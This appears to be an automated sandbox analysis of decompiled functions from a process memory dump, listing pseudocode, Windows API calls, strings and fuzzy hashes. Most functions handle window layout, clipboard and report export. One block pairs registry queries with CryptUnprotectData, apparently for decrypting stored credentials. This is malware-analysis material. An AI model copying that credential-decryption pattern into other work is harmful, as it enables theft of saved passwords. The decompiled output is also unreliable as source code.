                                          • Instruction ID: 794633c49b8c9c94e8125cdebcfe219ffcc263fe4270280c1a3d0952be7122e7
                                          • Opcode Fuzzy Hash: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
                                          • Instruction Fuzzy Hash: EA2130B2608702ADE718DE7598407D6F7D4BF05715F20022FE66CD2180FB39A554CB9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040B3FF(void* __esi) {
                                          				struct HDWP__* _v8;
                                          				int _v12;
                                          				intOrPtr _v16;
                                          				struct tagRECT _v32;
                                          				struct tagRECT _v48;
                                          				void* _t32;
                                          				int _t60;
                                          				int _t65;
                                          
                                          				if( *((intOrPtr*)(__esi + 0x140)) != 0) {
                                          					GetClientRect( *(__esi + 0x108),  &_v32);
                                          					GetWindowRect( *(__esi + 0x114),  &_v48);
                                          					_t65 = _v48.bottom - _v48.top + 1;
                                          					GetWindowRect( *(__esi + 0x118),  &_v48);
                                          					_v12 = _v32.right - _v32.left;
                                          					_t60 = _v48.bottom - _v48.top + 1;
                                          					_v16 = _v32.bottom - _v32.top;
                                          					_v8 = BeginDeferWindowPos(3);
                                          					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
                                          					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
                                          					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x390)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
                                          					return EndDeferWindowPos(_v8);
                                          				}
                                          				return _t32;
                                          			}












                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 0040B41E
                                          • GetWindowRect.USER32(?,?), ref: 0040B434
                                          • GetWindowRect.USER32(?,?), ref: 0040B447
                                          • BeginDeferWindowPos.USER32(00000003), ref: 0040B464
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B481
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B4A1
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B4C8
                                          • EndDeferWindowPos.USER32(?), ref: 0040B4D1
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Window$Defer$Rect$BeginClient
                                          • String ID:
                                          • API String ID: 2126104762-0
                                          • Opcode ID: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
                                          • Instruction ID: fdc4126930c1b8f3c9151252813053957ee6f88c11e53af12b0e4d030a96b888
                                          • Opcode Fuzzy Hash: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
                                          • Instruction Fuzzy Hash: CA21D672900609FFDF12CFA8DD89FEEBBB9FB48310F108464FA55A2160C7316A519B24
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E004072B5(void* _a4) {
                                          				void* _t7;
                                          				signed int _t10;
                                          				int _t12;
                                          				void* _t16;
                                          				signed int _t18;
                                          				void* _t21;
                                          
                                          				_t21 = _a4;
                                          				_t18 = 0;
                                          				EmptyClipboard();
                                          				if(_t21 != 0) {
                                          					_t2 = strlen(_t21) + 1; // 0x1
                                          					_t12 = _t2;
                                          					_t7 = GlobalAlloc(0x2000, _t12);
                                          					_t16 = _t7;
                                          					if(_t16 != 0) {
                                          						GlobalFix(_t16);
                                          						memcpy(_t7, _t21, _t12);
                                          						GlobalUnWire(_t16);
                                          						_t10 = SetClipboardData(1, _t16);
                                          						asm("sbb esi, esi");
                                          						_t18 =  ~( ~_t10);
                                          					}
                                          				}
                                          				CloseClipboard();
                                          				return _t18;
                                          			}










                                          APIs
                                          • EmptyClipboard.USER32 ref: 004072BD
                                          • strlen.MSVCRT ref: 004072CA
                                          • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040BB80,?), ref: 004072D9
                                          • GlobalFix.KERNEL32(00000000), ref: 004072E6
                                          • memcpy.MSVCRT ref: 004072EF
                                          • GlobalUnWire.KERNEL32(00000000), ref: 004072F8
                                          • SetClipboardData.USER32(00000001,00000000), ref: 00407301
                                          • CloseClipboard.USER32 ref: 00407311
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                          • String ID:
                                          • API String ID: 2315226746-0
                                          • Opcode ID: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
                                          • Instruction ID: b56ddb85736e4a30ce9fec78ed7ee79c44370bf8c75140d3078b235505e53826
                                          • Opcode Fuzzy Hash: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
                                          • Instruction Fuzzy Hash: 7DF0B437A00619BBD3112BA1BC4CEDB7B2CDBC4B96B054179FE05D6152DA38980486F9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 26%
                                          			E0040A129(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                          				signed int _v8;
                                          				char* _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				char _v48;
                                          				char _v68;
                                          				void _v96;
                                          				signed int _t51;
                                          				char* _t53;
                                          				intOrPtr* _t61;
                                          				intOrPtr* _t65;
                                          				signed int _t66;
                                          				intOrPtr _t80;
                                          				intOrPtr* _t87;
                                          				signed int _t91;
                                          				void* _t92;
                                          				void* _t93;
                                          
                                          				_t65 = __ebx;
                                          				_t66 = 6;
                                          				memcpy( &_v96, 0x4183e4, _t66 << 2);
                                          				_t93 = _t92 + 0xc;
                                          				asm("movsw");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsw");
                                          				asm("movsb");
                                          				E004067EC(_a4, "<tr>");
                                          				_t91 = 0;
                                          				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
                                          					do {
                                          						_t51 =  *( *((intOrPtr*)(_t65 + 0x24)) + _t91 * 4);
                                          						_v8 = _t51;
                                          						_t53 =  &_v96;
                                          						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t65 + 0x34)) + 4)) == 0) {
                                          							_t53 =  &_v48;
                                          						}
                                          						_t87 = _a8;
                                          						_v28 = _v28 | 0xffffffff;
                                          						_v24 = _v24 | 0xffffffff;
                                          						_v20 = _v20 | 0xffffffff;
                                          						_v16 = _v16 & 0x00000000;
                                          						_v12 = _t53;
                                          						 *((intOrPtr*)( *_t65 + 0x30))(4, _t91, _t87,  &_v28);
                                          						0x41241f(_v28,  &_v68);
                                          						 *((intOrPtr*)( *_t87))(_v8,  *(_t65 + 0x4c));
                                          						0x41244b();
                                          						 *((intOrPtr*)( *_t65 + 0x48))( *((intOrPtr*)(_t65 + 0x50)), _t87, _v8);
                                          						_t61 =  *((intOrPtr*)(_t65 + 0x50));
                                          						_t80 =  *_t61;
                                          						if(_t80 == 0 || _t80 == 0x20) {
                                          							0x413cf4(_t61, "&nbsp;");
                                          						}
                                          						0x4124d4( *((intOrPtr*)(_t65 + 0x54)),  *((intOrPtr*)(_t65 + 0x50)));
                                          						sprintf( *(_t65 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t65 + 0x54)));
                                          						E004067EC(_a4,  *(_t65 + 0x4c));
                                          						_t93 = _t93 + 0x20;
                                          						_t91 = _t91 + 1;
                                          					} while (_t91 <  *((intOrPtr*)(_t65 + 0x20)));
                                          				}
                                          				return E004067EC(_a4, 0x417de8);
                                          			}























                                          APIs
                                            • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                            • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                          • _mbscat.MSVCRT ref: 0040A1EE
                                          • sprintf.MSVCRT ref: 0040A210
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileWrite_mbscatsprintfstrlen
                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                          • API String ID: 1631269929-4153097237
                                          • Opcode ID: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
                                          • Instruction ID: f5ff55beaed6f71e33551b2c4209876a9ab5e20235427d51249a725151ce9b26
                                          • Opcode Fuzzy Hash: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
                                          • Instruction Fuzzy Hash: 68318231900209AFCF05DF54C8869DE7BB6FF44314F10416AFD11BB2A2DB76A955CB84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _mbscpy.MSVCRT ref: 004087EA
                                            • Part of subcall function 00408BF9: _itoa.MSVCRT ref: 00408C1A
                                          • strlen.MSVCRT ref: 00408808
                                          • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                          • memcpy.MSVCRT ref: 00408877
                                            • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408715
                                            • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408733
                                            • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408751
                                            • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408761
                                          Strings
                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408783
                                          • strings, xrefs: 004087E0
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                          • API String ID: 4036804644-4125592482
                                          • Opcode ID: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
                                          • Instruction ID: dfb39b5d66abeec2138625290c7fe1e8033edbc7f9ca8f6d480f1a826448875f
                                          • Opcode Fuzzy Hash: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
                                          • Instruction Fuzzy Hash: 60316E3E6001119FD714AF16EE809F63769FB84308794843EEC81A72A6DB39A841CB5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,73AFF420,00000000), ref: 0040FD62
                                          • RegCloseKey.ADVAPI32(?,?,73AFF420,00000000), ref: 0040FE4D
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          • memcpy.MSVCRT ref: 0040FDD4
                                          • LocalFree.KERNEL32(?,?,00000000,?,?,73AFF420,00000000), ref: 0040FDE6
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,73AFF420,00000000), ref: 0040FE2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
                                          • String ID:
                                          • API String ID: 2372935584-3916222277
                                          • Opcode ID: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
                                          • Instruction ID: 0b8e4f374d5667c45180376da1c8b12cffb8e3ff2062487e5a08cff45f7818d2
                                          • Opcode Fuzzy Hash: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
                                          • Instruction Fuzzy Hash: 6B414CB2900209ABCF21DF95D940ADEBBF8AF48304F10407BE915B7291D774AA44CFA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 20%
                                          			E00408D47(struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
                                          				int _v0;
                                          				int _t25;
                                          				char* _t31;
                                          				intOrPtr _t32;
                                          				int _t43;
                                          				signed int _t45;
                                          				signed int _t46;
                                          
                                          				_t46 = _t45 & 0xfffffff8;
                                          				0x414060();
                                          				_t25 = GetMenuItemCount(_a8);
                                          				_t43 = 0;
                                          				_v0 = _t25;
                                          				if(_t25 <= 0) {
                                          					L13:
                                          					return _t25;
                                          				} else {
                                          					goto L1;
                                          				}
                                          				do {
                                          					L1:
                                          					memset( &_a53, 0, 0x1000);
                                          					_t46 = _t46 + 0xc;
                                          					_a40 =  &_a52;
                                          					_a4.cbSize = 0x30;
                                          					_a8 = 0x36;
                                          					_a44 = 0x1000;
                                          					_a20 = 0;
                                          					_a52 = 0;
                                          					_t25 = GetMenuItemInfoA(_a8, _t43, 1,  &_a4);
                                          					if(_t25 == 0) {
                                          						goto L12;
                                          					}
                                          					if(_a52 == 0) {
                                          						L10:
                                          						if(_a24 != 0) {
                                          							_push(0);
                                          							_push(_a24);
                                          							_push(_a4.cbSize);
                                          							_t25 = E00408D47();
                                          							_t46 = _t46 + 0xc;
                                          						}
                                          						goto L12;
                                          					}
                                          					_t31 = strchr( &_a52, 9);
                                          					if(_t31 != 0) {
                                          						 *_t31 = 0;
                                          					}
                                          					_t32 = _a20;
                                          					if(_a24 != 0) {
                                          						if(_a12 == 0) {
                                          							 *0x41e1fc =  *0x41e1fc + 1;
                                          							_t32 =  *0x41e1fc + 0x11558;
                                          						} else {
                                          							_t18 = _t43 + 0x11171; // 0x11171
                                          							_t32 = _t18;
                                          						}
                                          					}
                                          					_t25 = E00408D0F(_t32,  &_a52);
                                          					goto L10;
                                          					L12:
                                          					_t43 = _t43 + 1;
                                          				} while (_t43 < _v0);
                                          				goto L13;
                                          			}











                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                          • String ID: 0$6
                                          • API String ID: 2300387033-3849865405
                                          • Opcode ID: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
                                          • Instruction ID: e6c6313dcb9b7a471bbfbaa7ec765517bc0a4c64eff5ea5afbcc667e6a019d72
                                          • Opcode Fuzzy Hash: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
                                          • Instruction Fuzzy Hash: DD21BF71408384AFD7118F11D881A9BB7E8FF85348F044A3FF584A62D0EB39D944CB9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E00407034(char* __ebx, intOrPtr _a4) {
                                          				int _v8;
                                          				char _v12;
                                          				void _v1035;
                                          				void _v1036;
                                          				int _t28;
                                          				int _t34;
                                          				char* _t39;
                                          				int _t42;
                                          				void* _t43;
                                          				void** _t45;
                                          				void* _t46;
                                          				void* _t47;
                                          
                                          				_t42 = 0;
                                          				_v1036 = 0;
                                          				memset( &_v1035, 0, 0x3ff);
                                          				_t47 = _t46 + 0xc;
                                          				 *__ebx = 0;
                                          				_t45 = _a4 + 4;
                                          				_v12 = 8;
                                          				do {
                                          					_push( *_t45);
                                          					_push( *((intOrPtr*)(_t45 - 4)));
                                          					sprintf( &_v1036, "%s (%s)");
                                          					_t28 = strlen( &_v1036);
                                          					_v8 = _t28;
                                          					memcpy(_t42 + __ebx,  &_v1036, _t28 + 1);
                                          					_t43 = _t42 + _v8 + 1;
                                          					_t34 = strlen( *_t45);
                                          					_v8 = _t34;
                                          					memcpy(_t43 + __ebx,  *_t45, _t34 + 1);
                                          					_t47 = _t47 + 0x30;
                                          					_t45 =  &(_t45[2]);
                                          					_t17 =  &_v12;
                                          					 *_t17 = _v12 - 1;
                                          					_t42 = _t43 + _v8 + 1;
                                          				} while ( *_t17 != 0);
                                          				_t39 = _t42 + __ebx;
                                          				 *_t39 = 0;
                                          				 *((char*)(_t39 + 1)) = 0;
                                          				return __ebx;
                                          			}
















                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpystrlen$memsetsprintf
                                          • String ID: %s (%s)
                                          • API String ID: 3756086014-1363028141
                                          • Opcode ID: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                          • Instruction ID: a198fb7af375a94c8e27cd288863d28c10177bb58caa4549e63a683f86c2f09a
                                          • Opcode Fuzzy Hash: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                          • Instruction Fuzzy Hash: 93114FB2800158BBDB21DF69DC45BDABBBCEF01309F0005AAE644B7101D775AB55CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscat$memsetsprintf
                                          • String ID: %2.2X
                                          • API String ID: 125969286-791839006
                                          • Opcode ID: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
                                          • Instruction ID: 5142681b0c0ad1f2d34765b6081944bd4f79e84a169991ad97d052608da76018
                                          • Opcode Fuzzy Hash: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
                                          • Instruction Fuzzy Hash: 82012872A0431466D7225A26DC43BEB77AC9B44B05F10007FFC45B51C1FABC96C447D8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$_mbscat
                                          • String ID: eK@$memcpy$msvcrt.dll
                                          • API String ID: 2404237207-527332992
                                          • Opcode ID: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
                                          • Instruction ID: ade7c94f42c2b1d8f6f4d02d55b8563967db19c46ba0ec0bd93feed85f1333d3
                                          • Opcode Fuzzy Hash: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
                                          • Instruction Fuzzy Hash: 7701001144DBC089E372D7289549B97AEE51B22608F48098DD1C647A83D2AAB65CC3BA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E00408B7A(struct HWND__* _a4) {
                                          				void _v4103;
                                          				char _v4104;
                                          
                                          				0x414060();
                                          				if( *0x41e200 != 0) {
                                          					_v4104 = 0;
                                          					memset( &_v4103, 0, 0x1000);
                                          					_push( *0x41e348);
                                          					sprintf(0x41e308, "dialog_%d");
                                          					if(E00408C31(?str?,  &_v4104) != 0) {
                                          						SetWindowTextA(_a4,  &_v4104);
                                          					}
                                          					return EnumChildWindows(_a4, E00408B1D, 0);
                                          				}
                                          				return 0x1004;
                                          			}






                                          APIs
                                          • memset.MSVCRT ref: 00408BA5
                                          • sprintf.MSVCRT ref: 00408BBA
                                            • Part of subcall function 00408C31: memset.MSVCRT ref: 00408C55
                                            • Part of subcall function 00408C31: GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
                                            • Part of subcall function 00408C31: _mbscpy.MSVCRT ref: 00408C91
                                          • SetWindowTextA.USER32(?,?), ref: 00408BE1
                                          • EnumChildWindows.USER32(?,Function_00008B1D,00000000), ref: 00408BF1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                          • String ID: caption$dialog_%d
                                          • API String ID: 2923679083-4161923789
                                          • Opcode ID: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
                                          • Instruction ID: de831da21bc0203e5008b33b3115c9aeec9d60fef0dfeaee9ccd5ecb51ae2e74
                                          • Opcode Fuzzy Hash: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
                                          • Instruction Fuzzy Hash: EEF0C27054034CBAEB129751DC06FD93A686B08B05F0440AABB84B11D1DEB896C08B1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004107B0,00000000,?), ref: 0041138D
                                          • memset.MSVCRT ref: 004113EA
                                          • memset.MSVCRT ref: 004113FC
                                            • Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198
                                          • memset.MSVCRT ref: 004114E3
                                          • _mbscpy.MSVCRT ref: 00411508
                                          • CloseHandle.KERNEL32(?,004107B0,?), ref: 00411552
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                          • String ID:
                                          • API String ID: 3974772901-0
                                          • Opcode ID: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
                                          • Instruction ID: 2b4e81a65471dd6bda77e3e7a539d18b8ecf8660f8cea3ab0205070076e1852f
                                          • Opcode Fuzzy Hash: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
                                          • Instruction Fuzzy Hash: 5F511FB1D00218ABDF10DF95DC85ADEBBB9EF48704F0040A6E609A6251D7759FC0CF69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E0040807D(char* __ebx, void* __eflags, void _a4, void _a8, intOrPtr _a12, short _a16) {
                                          				void _v8;
                                          				void _v12;
                                          				char _v28;
                                          				char _v116;
                                          				char _v244;
                                          				char _v248;
                                          				char _v372;
                                          				void _v627;
                                          				char _v628;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t44;
                                          				intOrPtr* _t50;
                                          				int _t57;
                                          				char* _t66;
                                          				signed int _t69;
                                          				intOrPtr _t75;
                                          				int _t76;
                                          				void* _t82;
                                          				void* _t83;
                                          
                                          				_t66 = __ebx;
                                          				_t76 = 0;
                                          				memcpy( &_v12,  &_a8, 4);
                                          				memcpy( &_v8,  &_a4, 4);
                                          				E0040C905( &_v116);
                                          				_push( &_v12);
                                          				_t44 = 8;
                                          				E0040C929(_t44,  &_v116);
                                          				E0040C9C7(0,  &_v116,  &_v28);
                                          				E00405235( &_v372);
                                          				_t69 = 0;
                                          				_t50 =  &_v248;
                                          				do {
                                          					 *((intOrPtr*)(_t83 + _t69 * 4 - 0xf0)) =  *((intOrPtr*)(_t50 - 4));
                                          					_t75 =  *_t50;
                                          					 *((intOrPtr*)(_t83 + _t69 * 4 - 0xec)) = _t75;
                                          					_t69 = _t69 + 2;
                                          					_t50 = _t50 - 8;
                                          				} while (_t69 < 0x20);
                                          				if(_a16 >= 8) {
                                          					_v628 = 0;
                                          					memset( &_v627, 0, 0xfe);
                                          					_t81 = _a12;
                                          					E00405641(_a12, _t69, __ebx,  &_v244);
                                          					if(_a16 < 0x10) {
                                          						__ebx[8] = 0;
                                          					} else {
                                          						E00405641(_t81 + 8,  &_v244,  &(__ebx[8]),  &_v244);
                                          						__ebx[0x10] = 0;
                                          					}
                                          					_t57 = strlen(_t66);
                                          					if(_t57 > 2) {
                                          						asm("cdq");
                                          						_t82 = (_t57 - _t75 >> 1) - 1 + _t66;
                                          						0x413d0c( &_v628, _t82 + 2);
                                          						0x413d0c(_t82,  &_v628);
                                          					}
                                          					_t76 = 1;
                                          				}
                                          				return _t76;
                                          			}
























                                          APIs
                                          • memcpy.MSVCRT ref: 00408094
                                          • memcpy.MSVCRT ref: 004080A3
                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                            • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                          • memset.MSVCRT ref: 00408120
                                          • strlen.MSVCRT ref: 00408160
                                          • _mbscpy.MSVCRT ref: 0040817F
                                          • _mbscpy.MSVCRT ref: 0040818C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpymemset$_mbscpy$strlen
                                          • String ID:
                                          • API String ID: 2712745786-0
                                          • Opcode ID: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                          • Instruction ID: bdbe0c05a74f47d21f032104af17620136749afb05b7a30319e2a8bb584ff9b0
                                          • Opcode Fuzzy Hash: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                          • Instruction Fuzzy Hash: AC3194728001099ACF14EF65DC85BDE77BCAF44304F00446FE549E7181EB74A68A8BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040B8FA(void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				intOrPtr _v52;
                                          				intOrPtr _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v64;
                                          				intOrPtr _v68;
                                          				char _v72;
                                          				void _v1095;
                                          				char _v1096;
                                          				void* __ebx;
                                          				void* _t39;
                                          				signed short _t52;
                                          
                                          				_v1096 = 0;
                                          				memset( &_v1095, 0, 0x3ff);
                                          				_v8 = 0x747874;
                                          				_v72 = E0040876F(0x1f5);
                                          				_v68 = 0x418600;
                                          				_v64 = E0040876F(0x1f6);
                                          				_v60 = 0x418600;
                                          				_v56 = E0040876F(0x1f7);
                                          				_v52 = 0x418600;
                                          				_v48 = E0040876F(0x1f8);
                                          				_v44 = 0x418608;
                                          				_v40 = E0040876F(0x1f9);
                                          				_v36 = 0x418608;
                                          				_v32 = E0040876F(0x1fa);
                                          				_v28 = 0x418618;
                                          				_v24 = E0040876F(0x1fb);
                                          				_v20 = 0x418620;
                                          				_v16 = E0040876F(0x1fc);
                                          				_v12 = 0x418620;
                                          				E00407034( &_v1096,  &_v72);
                                          				_t52 = 7;
                                          				_t39 = E0040876F(_t52);
                                          				_t23 =  &_v8; // 0x747874
                                          				return E00406E60(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
                                          			}


























                                          APIs
                                          • memset.MSVCRT ref: 0040B91A
                                            • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                            • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                            • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                            • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                            • Part of subcall function 00407034: memset.MSVCRT ref: 00407055
                                            • Part of subcall function 00407034: sprintf.MSVCRT ref: 0040707E
                                            • Part of subcall function 00407034: strlen.MSVCRT ref: 0040708A
                                            • Part of subcall function 00407034: memcpy.MSVCRT ref: 0040709F
                                            • Part of subcall function 00407034: strlen.MSVCRT ref: 004070AD
                                            • Part of subcall function 00407034: memcpy.MSVCRT ref: 004070BD
                                            • Part of subcall function 00406E60: _mbscpy.MSVCRT ref: 00406EC6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                          • API String ID: 2726666094-3614832568
                                          • Opcode ID: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
                                          • Instruction ID: 663635aaa2767a47ae833ce325b1c2bbb94a135e02c7cec880bc1d98f4d47d81
                                          • Opcode Fuzzy Hash: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
                                          • Instruction Fuzzy Hash: 8E21EBB5C002189FCB01FFA5DA817DDBBB4AB08708F20417FE549B7286DF381A558B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E00406CAA(void* __edx, struct HWND__* _a4) {
                                          				int _v8;
                                          				struct tagRECT _v24;
                                          				int _t17;
                                          				void* _t36;
                                          				struct HDC__* _t38;
                                          
                                          				_t36 = __edx;
                                          				_t38 = GetDC(0);
                                          				_t17 = GetDeviceCaps(_t38, 8);
                                          				_v8 = GetDeviceCaps(_t38, 0xa);
                                          				ReleaseDC(0, _t38);
                                          				GetWindowRect(_a4,  &_v24);
                                          				asm("cdq");
                                          				asm("cdq");
